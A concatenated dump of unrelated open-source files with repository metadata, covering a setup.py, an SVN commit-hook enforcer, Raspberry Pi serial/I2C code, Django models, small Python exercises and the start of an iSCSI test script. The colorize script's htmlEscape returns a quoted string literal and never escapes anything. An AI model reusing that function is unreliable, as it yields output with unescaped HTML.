"""A setuptools based setup module. See: https://packaging.python.org/en/latest/distributing.html https://github.com/pypa/sampleproject """ # Always prefer setuptools over distutils from setuptools import setup, find_packages # To use a consistent encoding from codecs import open from os import path here = path.abspath(path.dirname(__file__)) # Get the long description from the README file with open(path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name='test_sample', # Versions should comply with PEP440. For a discussion on single-sourcing # the version across setup.py and the project code, see # https://packaging.python.org/en/latest/single_source_version.html version='1.0.0', description='A GStreamer test video project', long_description=long_description, # The project's main homepage. url='https://github.com/gscigala/packet-generation', # Author details author='Guillaume Scigala', author_email='[email protected]', # Choose your license license='MIT', # See https://pypi.python.org/pypi?%3Aaction=list_classifiers classifiers=[ # How mature is this project? Common values are # 3 - Alpha # 4 - Beta # 5 - Production/Stable 'Development Status :: 3 - Alpha', # Indicate who your project is intended for 'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools', # Pick your license as you wish (should match "license" above) 'License :: OSI Approved :: MIT License', # Specify the Python versions you support here. In particular, ensure # that you indicate whether you support Python 2, Python 3 or both. 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7' ], # What does your project relate to? keywords='sample setuptools development streaming', # You can just specify the packages manually here if your project is # simple. Or you can use find_packages(). packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Alternatively, if you want to distribute just a my_module.py, uncomment # this: # py_modules=["my_module"], # List run-time dependencies here. These will be installed by pip when # your project is installed. For an analysis of "install_requires" vs pip's # requirements files see: # https://packaging.python.org/en/latest/requirements.html #install_requires=['peppercorn'], # List additional groups of dependencies here (e.g. development # dependencies). You can install these using the following syntax, # for example: # $ pip install -e .[dev,test] extras_require={ #'dev': ['check-manifest'], #'test': ['coverage'], }, # If there are data files included in your packages that need to be # installed, specify them here. If using Python 2.6 or less, then these # have to be included in MANIFEST.in as well. package_data={ 'test_sample': [ 'data/logging.conf' ], }, # Although 'package_data' is the preferred approach, in some case you may # need to place data files outside of your packages. See: # http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa # In this case, 'data_file' will be installed into '<sys.prefix>/my_data' #data_files=[('my_data', ['data/data_file'])], # To provide executable scripts, use entry points in preference to the # "scripts" keyword. Entry points provide cross-platform support and allow # pip to create the appropriate form of executable for the target platform. entry_points={ 'console_scripts': [ 'testSample=test_sample.__main__:main', ], }, )
940dfcffd7da2f2431e4e7d093e93c7a44d5ca3b
9699ff2d4f407746c80c507f158da02f5ab9596a
/subversion/contrib/hook-scripts/enforcer/.svn/text-base/enforcer.svn-base
caacf749ddd37057e18c2fd432789b0043a5914f
[ "BSD-3-Clause", "Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "X11" ]
permissive
AsherBond/MondocosmOS-Dependencies
7af67e41ae60b578800fc4184fa69a6b44da1715
bfd2554e6c2cfc4bc1ecb2b653594ca9f0448392
refs/heads/master
2021-01-23T13:53:07.122515
2011-10-03T13:22:43
2011-10-03T13:22:43
2,504,513
0
1
null
null
null
null
UTF-8
Python
false
false
17,260
#!/usr/bin/python # -*- coding:utf-8;mode:python;mode:font-lock -*- ## # Utility for Subversion commit hook scripts # This script enforces certain coding guidelines ## # Copyright (c) 2005 Wilfredo Sanchez Vega <[email protected]>. # All rights reserved. # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHORS DISCLAIM ALL # WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE # AUTHORS BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL # DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR # PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER # TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR # PERFORMANCE OF THIS SOFTWARE. ## import sys import os import getopt import popen2 # # FIXME: Should probably retool this using python bindings, not svnlook # __doc__ = ''' Enforcer is a utility which can be used in a Subversion pre-commit hook script to enforce various requirements which a repository administrator would like to impose on data coming into the repository. A couple of example scenarios: - In a Java project I work on, we use log4j extensively. Use of System.out.println() bypasses the control that we get from log4j, so we would like to discourage the addition of println calls in our code. We want to deny any commits that add a println into the code. The world being full of exceptions, we do need a way to allow some uses of println, so we will allow it if the line of code that calls println ends in a comment that says it is ok: System.out.println("No log4j here"); // (authorized) We also do not (presently) want to refuse a commit to a file which already has a println in it. There are too many already in the code and a given developer may not have time to fix them up before commiting an unrelated change to a file. - The above project uses WebObjects, and you can enable debugging in a WebObjects component by turning on the WODebug flag in the component WOD file. That is great for debugging, but massively bloats the log files when the application is deployed. We want to disable any commit of a file enabling WODebug, regardless of whether the committer made the change or not; these have to be cleaned up before any successful commit. What this script does is it uses svnlook to peek into the transaction is progress. As it sifts through the transaction, it calls out to a set of hooks which allow the repository administrator to examine what is going on and decide whether it is acceptable. Hooks may be written (in Python) into a configuration file. If the hook raises an exception, enforcer will exit with an error status (and presumably the commit will be denied by th pre-commit hook). The following hooks are available: verify_file_added(filename) - called when a file is added. verify_file_removed(filename) - called when a file is removed. verify_file_copied(destination_filename, source_filename) - called when a file is copied. verify_file_modified(filename) - called when a file is modified. verify_line_added(filename, line) - called for each line that is added to a file. (verify_file_modified() will have been called on the file beforehand) verify_line_removed(filename, line) - called for each line that is removed from a file. (verify_file_modified() will have been called on the file beforehand) verify_property_line_added(filename, property, line) - called for each line that is added to a property on a file. verify_property_line_removed(filename, property, line) - called for each line that is removed from a property on a file. In addition, these functions are available to be called from within a hook routine: open_file(filename) - Returns an open file-like object from which the data of the given file (as available in the transaction being processed) can be read. In our example scenarios, we can deny the addition of println calls by hooking into verify_line_added(): if the file is a Java file, and the added line calls println, raise an exception. Similarly, we can deny the commit of any WOD file enabling WODebug by hooking into verify_file_modified(): open the file using open_file(), then raise if WODebug is enabled anywhere in the file. Note that verify_file_modified() is called once per modified file, whereas verify_line_added() and verify_line_removed() may each be called zero or many times for each modified file, depending on the change. This makes verify_file_modified() appropriate for checking the entire file and the other two appropriate for checking specific changes to files. These example scenarios are implemented in the provided example configuration file "enforcer.conf". When writing hooks, it is usually easier to test the hooks on committed transactions already in the repository, rather than installing the hook and making commits to test the them. Enforcer allows you to specify either a transaction ID (for use in a hook script) or a revision number (for testing). You can then, for example, find a revision that you would like to have blocked (or not) and test your hooks against that revision. ''' __author__ = "Wilfredo Sanchez Vega <[email protected]>" ## # Handle command line ## program = os.path.split(sys.argv[0])[1] debug = 0 transaction = None revision = None def usage(e=None): if e: print e print "" print "usage: %s [options] repository config" % program print "options:" print "\t-d, --debug Print debugging output; use twice for more" print "\t-r, --revision rev Specify revision to check" print "\t-t, --transaction txn Specify transaction to check" print "Exactly one of --revision or --transaction is required" sys.exit(1) # Read options try: (optargs, args) = getopt.getopt(sys.argv[1:], "dt:r:", ["debug", "transaction=", "revision="]) except getopt.GetoptError, e: usage(e) for optarg in optargs: (opt, arg) = optarg if opt in ("-d", "--debug" ): debug += 1 elif opt in ("-t", "--transaction"): transaction = arg elif opt in ("-r", "--revision" ): revision = arg if transaction and revision: usage("Cannot specify both transaction and revision to check") if not transaction and not revision: usage("Must specify transaction or revision to check") if not len(args): usage("No repository") repository = args.pop(0) if not len(args): usage("No config") configuration_filename = args.pop(0) if len(args): usage("Too many arguments") ## # Validation # All rule enforcement goes in these routines ## def open_file(filename): """ Retrieves the contents of the given file. """ cat_cmd = [ "svnlook", "cat", None, repository, filename ] if transaction: cat_cmd[2] = "--transaction=" + transaction elif revision: cat_cmd[2] = "--revision=" + revision else: raise ValueError("No transaction or revision") cat_out, cat_in = popen2.popen2(cat_cmd) cat_in.close() return cat_out def verify_file_added(filename): """ Here we verify file additions which may not meet our requirements. """ if debug: print "Added file %r" % filename if configuration.has_key("verify_file_added"): configuration["verify_file_added"](filename) def verify_file_removed(filename): """ Here we verify file removals which may not meet our requirements. """ if debug: print "Removed file %r" % filename if configuration.has_key("verify_file_removed"): configuration["verify_file_removed"](filename) def verify_file_copied(destination_filename, source_filename): """ Here we verify file copies which may not meet our requirements. """ if debug: print "Copied %r to %r" % (source_filename, destination_filename) if configuration.has_key("verify_file_copied"): configuration["verify_file_copied"](destination_filename, source_filename) def verify_file_modified(filename): """ Here we verify files which may not meet our requirements. Any failure, even if not due to the specific changes in the commit will raise an error. """ if debug: print "Modified file %r" % filename if configuration.has_key("verify_file_modified"): configuration["verify_file_modified"](filename) def verify_line_added(filename, line): """ Here we verify new lines of code which may not meet our requirements. Code not changed as part of this commit is not verified. """ if configuration.has_key("verify_line_added"): configuration["verify_line_added"](filename, line) def verify_line_removed(filename, line): """ Here we verify removed lines of code which may not meet our requirements. Code not changed as part of this commit is not verified. """ if configuration.has_key("verify_line_removed"): configuration["verify_line_removed"](filename, line) def verify_property_line_added(filename, property, line): """ Here we verify added property lines which may not meet our requirements. Code not changed as part of this commit is not verified. """ if debug: print "Add %s::%s: %s" % (filename, property, line) if configuration.has_key("verify_property_line_added"): configuration["verify_property_line_added"](filename, property, line) def verify_property_line_removed(filename, property, line): """ Here we verify removed property lines which may not meet our requirements. Code not changed as part of this commit is not verified. """ if debug: print "Del %s::%s: %s" % (filename, property, line) if configuration.has_key("verify_property_line_removed"): configuration["verify_property_line_removed"](filename, property, line) ## # Do the Right Thing ## configuration = {"open_file": open_file} execfile(configuration_filename, configuration, configuration) diff_cmd = [ "svnlook", "diff", None, repository ] if transaction: diff_cmd[2] = "--transaction=" + transaction elif revision: diff_cmd[2] = "--revision=" + revision else: raise ValueError("No transaction or revision") diff_out, diff_in = popen2.popen2(diff_cmd) diff_in.close() try: state = 0 # # This is the svnlook output parser # for line in diff_out: if line[-1] == "\n": line = line[:-1] # Zap trailing newline # Test cases: # r2266: Added text files, property changes # r18923: Added, deleted, modified text files # r25692: Copied files # r7758: Added binary files if debug > 1: print "%4d: %s" % (state, line) # Useful for testing parser problems if state is -1: # Used for testing new states: print whatever is left print line continue if state in (0, 100, 300): # Initial state or in a state that may return to initial state if state is 0 and not line: continue colon = line.find(":") if state is not 300 and colon != -1 and len(line) > colon + 2: action = line[:colon] filename = line[colon+2:] if action in ( "Modified", "Added", "Deleted", "Copied", "Property changes on", ): if action == "Modified": verify_file_modified(filename) elif action == "Added" : verify_file_added (filename) elif action == "Deleted" : verify_file_removed (filename) elif action == "Copied": i = filename.find(" (from rev ") destination_filename = filename[:i] filename = filename[i:] i = filename.find(", ") assert filename[-1] == ")" source_filename = filename[i+2:-1] verify_file_copied(destination_filename, source_filename) filename = destination_filename if action == "Modified" : state = 10 elif action == "Added" : state = 10 elif action == "Deleted" : state = 10 elif action == "Copied" : state = 20 elif action == "Property changes on": state = 30 else: raise AssertionError("Unknown action") current_filename = filename current_property = None continue assert state in (100, 300) if state is 10: # Expecting a bar (follows "(Added|Modified|Deleted):" line) assert line == "=" * 67 state = 11 continue if state is 11: # Expecting left file info (follows bar) if line == "": state = 0 elif line == "(Binary files differ)": state = 0 elif line.startswith("--- "): state = 12 else: raise AssertionError("Expected left file info, got: %r" % line) continue if state is 12: # Expecting right file info (follows left file info) assert line.startswith("+++ " + current_filename) state = 100 continue if state is 20: # Expecting a bar or blank (follows "Copied:" line) # Test cases: # r25692: Copied and not modified (blank) # r26613: Copied and modified (bar) if not line: state = 0 elif line == "=" * 67: state = 11 else: raise AssertionError("After Copied: line, neither bar nor blank: %r" % line) continue if state is 100: # Expecting diff data for c, verify in (("-", verify_line_removed), ("+", verify_line_added)): if len(line) >= 1 and line[0] == c: try: verify(current_filename, line[1:]) except Exception, e: sys.stderr.write(str(e)) sys.stderr.write("\n") sys.exit(1) break else: if ( not line or (len(line) >= 4 and line[:2] == "@@" == line[-2:]) or (len(line) >= 1 and line[0] == " ") or line == "\\ No newline at end of file" ): continue raise AssertionError("Expected diff data, got: %r" % line) continue if state is 30: # Expecting a bar (follows "Property changes on:" line) assert line == "_" * 67 state = 31 continue if state is 31: # Expecting property name (follows bar) for label in ( "Name", # svn versions < 1.5 "Added", "Modified", "Deleted" # svn versions >= 1.5 ): if line.startswith(label + ": "): break else: raise AssertionError("Unexpected property name line: %r" % line) state = 300 # Fall through to state 300 if state is 300: if not line: state = 0 continue for label in ( "Name", # svn versions < 1.5 "Added", "Modified", "Deleted" # svn versions >= 1.5 ): if line.startswith(label + ": "): current_property = line[len(label)+2:] current_verify_property_function = None break else: for prefix, verify in ( (" - ", verify_property_line_removed), (" + ", verify_property_line_added) ): if line.startswith(prefix): try: verify(current_filename, current_property, line[5:]) except Exception, e: sys.stderr.write(str(e)) sys.stderr.write("\n") sys.exit(1) current_verify_property_function = verify break else: if not line: continue if current_verify_property_function is None: raise AssertionError("Expected property diff data, got: %r" % line) else: # Multi-line property value current_verify_property_function(current_filename, current_property, line) continue raise AssertionError("Unparsed line: %r" % line) if debug: print "Commit is OK" finally: for line in diff_out: pass diff_out.close()
fa4752f737897f35e16ed0b252a1230746f6ee6d
7ff3ec2f2a6e093a63f09a30ec985c3564c79159
/Demo_2/Raspberry_Pi/Threading/Pi_Comms_Multi_Threading.py
7b0e7ee2d2290889fa410ff3a3ec584c98dfcb2e
[]
no_license
lkseattle/SEED_FALL_2020_T3-1
468dafe4193a6663d5dc6fa09ea7cfc9953f4455
b7e026fee1d6f77f62fd84547beebac3b76c2532
refs/heads/master
2023-01-10T21:47:24.578863
2020-11-10T09:34:58
2020-11-10T09:34:58
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,016
py
#Cameron Kramr #10/09/2020 #EENG 350 #Section A #Computer Vision #NOTE, this module requires pygame to be installed in order to run #The code in this file deals with communcicating with other devices outside of the raspberry pi. import multiprocessing as mp import termios import os import sys from enum import Enum from enum import IntEnum import time import serial import board import busio import adafruit_character_lcd.character_lcd_rgb_i2c as character_lcd from smbus2 import SMBus import math import ctypes #import spidev #Create the valid commands for controlling thread operation class I2C_CMD(IntEnum): LCD_CLR_MSG = 1 WRITE_ARDU = 2 FETCH_ANGLE = 3 class ARDU_CMD(IntEnum): TARGET = 250 SEND = 1 RECEIVE = 2 #Main Serial handler thread deals with Serial nonsense. def Serial_Handler(input_pipe, file = '/dev/ttyACM0', baud = 250000): #Initialize Serial object ser = serial.Serial(file, baud) FPS = 100 data2 = "" Start = time.time() #time.sleep(2) #might need it so 'ser' can work properly #Initialize variables data = [0,0,0] while (True): #Data shape: #[command, [magnitude, angle]] #Non-blocking read of pipe waiting for input try: if(input_pipe.poll()): data = input_pipe.recv() while(ser.inWaiting()>0): data2 += ser.readline().decode('utf-8') #print("Arduino Data:") #print(data2) except: print("Serial Error") #print("Looping") if(data[0] == ARDU_CMD.SEND): #Clear LCD and send it a string to display try: #ser.write((' '.join([str(item) for item in data[1]] for i in data[1]: if(i != '\n'): ser.write(i.encode()) #print(i) #print("Sent Ardu:" + str(data[1])) #pass except: print("Something's wrong with sending Serial Data!") if(data2 != ""): #if we need to get the position from arduino, this if statement #will do it. Feel free to alter "get_position" to whatever you want. try: #data2 = ser.readline().decode('utf-8').rstrip() #gets data from arduino input_pipe.send(data2) data2 = "" pass except: print("Something's wrong with getting Serial Data!") #Clear data data[0] = 0 #Frame lock arduino while(time.time() - Start < 1/FPS): pass #Main I2C handler thread deals with I2C nonsense. def I2C_Handler(input_pipe, size, address, color = [255, 0, 0]): #Initialize I2C objects i2c_bus = busio.I2C(board.SCL, board.SDA) lcd = character_lcd.Character_LCD_RGB_I2C(i2c_bus, size[1], size[0]) lcd.clear() #Initialize SMbus object sm_bus = SMBus(1) #Initialize variables I2C_FPS = 100 #Frame rate control for thread to conserve resources I2C_Start = 0 data = [0,0] data_in = ctypes.c_int8 #Initialize LCD screen lcd.clear() lcd.color = color lcd.message = "Init LCD Handler Done ;)" while(True): #Record time I2C_Start = time.time() #Data shape: #[cmd, content] #Non-blocking read of pipe waiting for input if(input_pipe.poll()): data = input_pipe.recv() #Switch on command portion of data to figure out what to do if(data[0] == I2C_CMD.LCD_CLR_MSG): #Clear LCD and send it a string to display try: #time.sleep(0.1) lcd.clear() lcd.message = str(data[1]) pass except: print("SM Bus Error!") elif(data[0] == I2C_CMD.WRITE_ARDU): #Write to the arduino #not needed anymore? try: print(data[1]) sm_bus.write_byte_data(address, 0, int(data[1])) except: print("SM Bus Error!") sm_bus = SMBus(1) elif(data[0] == I2C_CMD.FETCH_ANGLE): #Fetch the angle from the arduino #not needed anymore? #print(sm_bus.read_byte_data(address, 0)) try: #Need to preserve the sign to make this sensible, use ctypes for that data_in = ctypes.c_int8(sm_bus.read_byte_data(address, 0)) #Convert data in from byte to degree angle data_in = data_in.value/128*180 #Send angle down pipe input_pipe.send(data_in) except: print("SM Bus Error!") #Clear data data[0] = 0 #print("Sleep Time: " + str(max(1/I2C_FPS - (time.time() - I2C_Start),0))) #Frame lock the thread to preserve resources time.sleep(max(1/I2C_FPS - (time.time() - I2C_Start),0)) #print("I2C_FPS: " + str(int(1/(time.time() - I2C_Start)))) if __name__== "__main__": Serial_pipe_1, Serial_pipe_2 = mp.Pipe(duplex = True) comms = mp.Process(target = Serial_Handler, args=(Serial_pipe_2,)) comms.start() Serial_pipe_1.send([ARDU_CMD.SEND, 123,456]) Serial_pipe_1.send([ARDU_CMD.SEND, 456,123]) Serial_pipe_1.send([ARDU_CMD.SEND, 1453,2345]) Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345]) Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345]) Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345]) Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345]) Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345]) Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345]) choar = input()
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa
d8a541a2953c9729311059585bb0fca9003bd6ef
/Lists as stack ques/cups_and_bottles.py
efc8af013cd606d663a6539b7b98d2807e6c28fc
[]
no_license
grigor-stoyanov/PythonAdvanced
ef7d628d2b81ff683ed8dd47ee307c41b2276dd4
0a6bccc7faf1acaa01979d1e23cfee8ec29745b2
refs/heads/main
2023-06-10T09:58:04.790197
2021-07-03T02:52:20
2021-07-03T02:52:20
332,509,767
0
0
null
null
null
null
UTF-8
Python
false
false
604
py
from collections import deque cups = deque(map(int, input().split())) bottles = list(map(int, input().split())) wasted_water = 0 while cups and bottles: current_cup = cups.popleft() while current_cup > 0 and bottles: current_bottle = bottles.pop() current_cup -= current_bottle if current_cup < 0: wasted_water += -current_cup if not cups: print('Bottles: ', end='') print(*[bottles.pop() for i in range(len(bottles))]) else: print('Cups: ', end='') print(*[cups.popleft() for i in range(len(cups))]) print(f'Wasted litters of water: {wasted_water}')
653e1569defce82bd7cefae6b2b508f8851295a1
af4b590504660a302f53a6fd99a5cb2e1244b85f
/src/billing/models.py
d6325f0ceba818542cbc794137a9674a6eddcd9c
[]
no_license
qkhan/NewEcommerce
3216da9e80567f9c548efcac0dd00ee754399848
12f40adf071471bdc30d76e07bc563949c5f5d19
refs/heads/master
2020-03-09T22:59:24.568434
2018-04-11T06:52:10
2018-04-11T06:52:10
129,048,139
0
0
null
null
null
null
UTF-8
Python
false
false
1,701
py
from django.conf import settings from django.db import models from accounts.models import GuestEmail from django.db.models.signals import pre_save, post_save User = settings.AUTH_USER_MODEL class BillingProfileManager(models.Manager): def new_or_get(self, request): user = request.user guest_email_id = request.session.get('guest_email_id') print("Guest email id: ", guest_email_id) created = False obj = None if user.is_authenticated(): 'logged in user checkout; remember payment stuff' obj, created = self.model.objects.get_or_create(user=user, email=user.email) #print("Billing Profile:", billing_profile, " | ", billing_profile_created) elif guest_email_id is not None: 'guest user checkout; auto reloads payment stuff' guest_email_obj = GuestEmail.objects.get(id=guest_email_id) obj, created = self.model.objects.get_or_create(email=guest_email_obj.email) else: pass return obj, created # Create your models here. class BillingProfile(models.Model): user = models.OneToOneField(User, null=True, blank=True) email = models.EmailField() active = models.BooleanField(default=True) update = models.DateTimeField(auto_now=True) timestamp = models.DateTimeField(auto_now_add=True) objects = BillingProfileManager() def __str__(self): return self.email def user_created_receiver(sender, instance, created, *args, **kwargs): if created and instance.email: BillingProfile.objects.get_or_create(user=instance, email=instance.email) post_save.connect(user_created_receiver, sender=User)
09b1947d280f745d62a37740eb2545109fa7aba2
9ee0f0850d8743d08a2ecdf16e0e79ad58615908
/Arrendador/serializers.py
cabceb1ac480eb63740d2b5e64a3c8ee0f187ca9
[]
no_license
alexgrajales/plataforma-web-de-gesti-n-de-inmuebles-para-arrendatarios-independientes.
20fb4ebb60940cd9fa40010515e8116cb4418d39
ce335f05ff6f217a5c3b94022b51bf37b46adf5c
refs/heads/master
2022-11-04T08:01:14.427926
2017-12-01T22:16:56
2017-12-01T22:16:56
110,597,537
0
1
null
2022-10-05T04:58:51
2017-11-13T20:20:53
Python
UTF-8
Python
false
false
271
py
from rest_framework import serializers from rest_framework_mongoengine import serializers as mongoserializers from Arrendador.models import Arrendador class ArrendadorSerializer(mongoserializers.DocumentSerializer): class Meta: model = Arrendador fields = '__all__'
dca0df86cf196077787b8351e77a52367efaf8ea
a0af94e54aaeaf0dfc373196c3bc7372926a7c7f
/colorize
aca3ecc24004252a087c462d6b1a71056603bbf5
[ "MIT" ]
permissive
cheshirex/colorize
7170f3ff250009bc4ca40e7740498328b3bf1ab0
c95049c312a422023e48b8e1522c57b4c2913446
refs/heads/main
2023-01-07T05:58:04.019437
2020-11-04T10:27:57
2020-11-04T10:27:57
309,968,575
0
0
null
null
null
null
UTF-8
Python
false
false
3,445
#!/usr/bin/env python # Tool to colorize output based on regular expressions, designed to work both # with ANSI escape sequences and with HTML color codes. Data to colorize is input # on STDIN, and result is output on STDOUT # Usage: # colorize <ansi|html> <color config filename> import sys import re html_escape_table = { "&": "&amp;", '"': "&quot;", "'": "&apos;", ">": "&gt;", "<": "&lt;" } def htmlEscape(text): """Produce entities within text.""" try: result = '"".join(html_escape_table.get(c,c) for c in text)' except SyntaxError: print "HTML mode not supported prior to Python 2.4" sys.exit(1) return result def printHtmlHeader(): print ''' <html> <head> <style text="text/css"> body { font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; font-size: 14; } </style> </head> <body> <pre>''' def printHtmlFooter(): print ''' </pre> </body> </html> ''' escape = '\033' colors = {'black': {'ansi': {'begin': escape + '[0;30m', 'end': escape + '[0m'}, 'html': {'begin': '<font color=\'black\'>', 'end': '</font>'}}, 'red': {'ansi': {'begin': escape + '[0;31m', 'end': escape + '[0m'}, 'html': {'begin': '<font color=\'red\'>', 'end': '</font>'}}, 'green': {'ansi': {'begin': escape + '[0;32m', 'end': escape + '[0m'}, 'html': {'begin': '<font color=\'green\'>', 'end': '</font>'}}, 'yellow': {'ansi': {'begin': escape + '[0;33m', 'end': escape + '[0m'}, 'html': {'begin': '<font color=\'#C9960C\'>', 'end': '</font>'}}, 'blue': {'ansi': {'begin': escape + '[0;34m', 'end': escape + '[0m'}, 'html': {'begin': '<font color=\'blue\'>', 'end': '</font>'}}, 'purple': {'ansi': {'begin': escape + '[0;35m', 'end': escape + '[0m'}, 'html': {'begin': '<font color=\'purple\'>', 'end': '</font>'}}, 'cyan': {'ansi': {'begin': escape + '[0;36m', 'end': escape + '[0m'}, 'html': {'begin': '<font color=\'cyan\'>', 'end': '</font>'}}, 'white': {'ansi': {'begin': escape + '[0;37m', 'end': escape + '[0m'}, 'html': {'begin': '<font color=\'white\'>', 'end': '</font>'}}} if sys.argv[1] in ('html', 'ansi'): format = sys.argv[1] else: sys.exit(-1) rules = {} # Read color regular expressions configFile = open(sys.argv[2]) for line in configFile: if line[0] == '#': continue # Read each line - first word is colour ID, rest of line is regular expression color, regex = line.strip().split(None, 1) rules[regex] = color configFile.close() if format == 'html': printHtmlHeader() for line in sys.stdin: # Clean up Unicode characters line = line.replace('\xe2\x80\x98', "'").replace('\xe2\x80\x99',"'") for regex, color in rules.items(): if re.search(regex, line): if format == 'html': line = htmlEscape(line) print colors[color][format]['begin'] + line.strip() + colors[color][format]['end'] break else: if format == 'html': line = htmlEscape(line) print line.strip() if format == 'html': printHtmlFooter()
9b500090e5537a2b729caa78d0590d8753bbca89
b92adbd59161b701be466b3dbeab34e2b2aaf488
/.c9/metadata/environment/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py
34ca1ee1bb0f47da7e80c5643b393f16129c97b8
[]
no_license
R151865/cloud_9_files
7486fede7af4db4572f1b8033990a0f07f8749e8
a468c44e9aee4a37dea3c8c9188c6c06e91cc0c4
refs/heads/master
2022-11-22T10:45:39.439033
2020-07-23T09:31:52
2020-07-23T09:31:52
281,904,416
0
1
null
2022-11-20T00:47:10
2020-07-23T09:08:48
Python
UTF-8
Python
false
false
480
py
{"filter":false,"title":"api_wrapper.py","tooltip":"/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":17,"column":17},"end":{"row":17,"column":75},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1590407780811,"hash":"c7949160d2afabed4398d4df3013ec47e225082d"}
2fb3b208f8422d53eb69c09474b9e669b7f9db6b
b30def8f44060e373dba0de9facb62964224d285
/config.py
97dc08977f3cd997b513264801ccb5c7cf5c2f98
[]
no_license
saakash309/Data-Processing-
1136e2612b7068d9fef695587070e2b98ebb7ff8
7857de4654c611689b422d8d6c88e61ba498a4c0
refs/heads/main
2023-09-04T20:30:49.225368
2021-11-23T06:04:45
2021-11-23T06:04:45
430,939,150
0
0
null
null
null
null
UTF-8
Python
false
false
1,185
py
from configparser import ConfigParser from pprint import pprint #reading the config file class Data(): ''' Return a set of coulmns from a config file that will be displayed Path = path of the configuration file ''' def __init__(self,path) -> None: self.path = path def fields(self): config = ConfigParser() config.read(self.path) #finding the fields that needs to be displayed keys = [] if 'Idnumber' not in (config['Fields'])or config['Fields']['Idnumber']=='no': keys.append('IDNUMBER') #print(config.options('Fields')) for key,value in config.items(config.sections()[0]): if value == 'yes': keys.append(str(key).upper().strip()) return keys def fpath(self): config = ConfigParser() config.read(self.path) for key,value in config.items(config.sections()[-1]): #print(key,value) if key == 'PathtoDataFile'.lower(): #print(value) return value else: return None #print(Data('config.ini').fpath())
04a4e80f246a131d68d2616fcf175a178c694d71
d87d83049f28da72278ca9aa14986db859b6c6d6
/basic/coreFundamental/split_And_Join_And_strip/splitDemo.py
91db33efa0f6d30926f416fb183b4cd31e8ff63d
[]
no_license
MonadWizard/python-basic
6507c93dc2975d6450be27d08fb219a3fd80ed64
624f393fcd19aeeebc35b4c2225bb2fe8487db39
refs/heads/master
2021-07-21T16:12:58.251456
2020-10-12T19:46:21
2020-10-12T19:46:21
223,625,523
1
0
null
2019-11-23T18:01:43
2019-11-23T17:14:21
HTML
UTF-8
Python
false
false
1,046
py
s = 'this is a string of words' print(s.split()) print(""" """) print('That is also a string'.split()) print(""" """) print(s.split('i')) print(""" """) words = s.split() print(words) for w in words: print(w) # rsplit demo = "this is a fucked up" rsplitee = demo.rsplit(sep=" ", maxsplit=2) print(rsplitee) # lsplit demo = "this is a fucked up" lsplitee = demo.split(sep=" ", maxsplit=2) print(lsplitee) # splitlines split in \n demo = "this is a fucked up\nfucking univers" nsplitee = demo.splitlines() print(nsplitee) # test file = """mtv films election, a high school comedy, is a current example from there, director steven spielberg wastes no time, taking us into the water on a midnight swim """ file_split = file.splitlines() # Print file_split print(file_split) # Complete for-loop to split by commas for substring in file_split: substring_split = substring.split(",") print(substring_split)
d1877db7913e58c396ec934ebb1dc1c993bcbbb5
892dd32ee0be7135cd33c875b06dcc66307dcc99
/automation/MPTS/verifyIqn.py
b82a09a932deb898ea00bc911d3867e80a4c52da
[]
no_license
cloudbytestorage/devops
6d21ed0afd752bdde8cefa448d4433b435493ffa
b18193b08ba3d6538277ba48253c29d6a96b0b4a
refs/heads/master
2020-05-29T08:48:34.489204
2018-01-03T09:28:53
2018-01-03T09:28:53
68,889,307
4
8
null
2017-11-30T08:11:39
2016-09-22T05:53:44
Python
UTF-8
Python
false
false
5,429
py
import json import sys import time from time import ctime from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput config = configFile(sys.argv); stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response']) negativeFlag = 0 if len(sys.argv)== 3: if sys.argv[2].lower()== "negative": negativeFlag = 1; else: print "Argument is not correct.. Correct way as below" print " python verifyIqn.py config.txt" print " python verifyIqn.py config.txt negative" exit() for x in range(1, int(config['Number_of_ISCSIVolumes'])+1): startTime = ctime() executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)])) ### Discovery iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)])) # for negative testcase if negativeFlag == 1: ###no iscsi volumes discovered if iqnname==[]: print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)]) endTime = ctime() resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime) ### some iscsi volumes discovered else: output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' 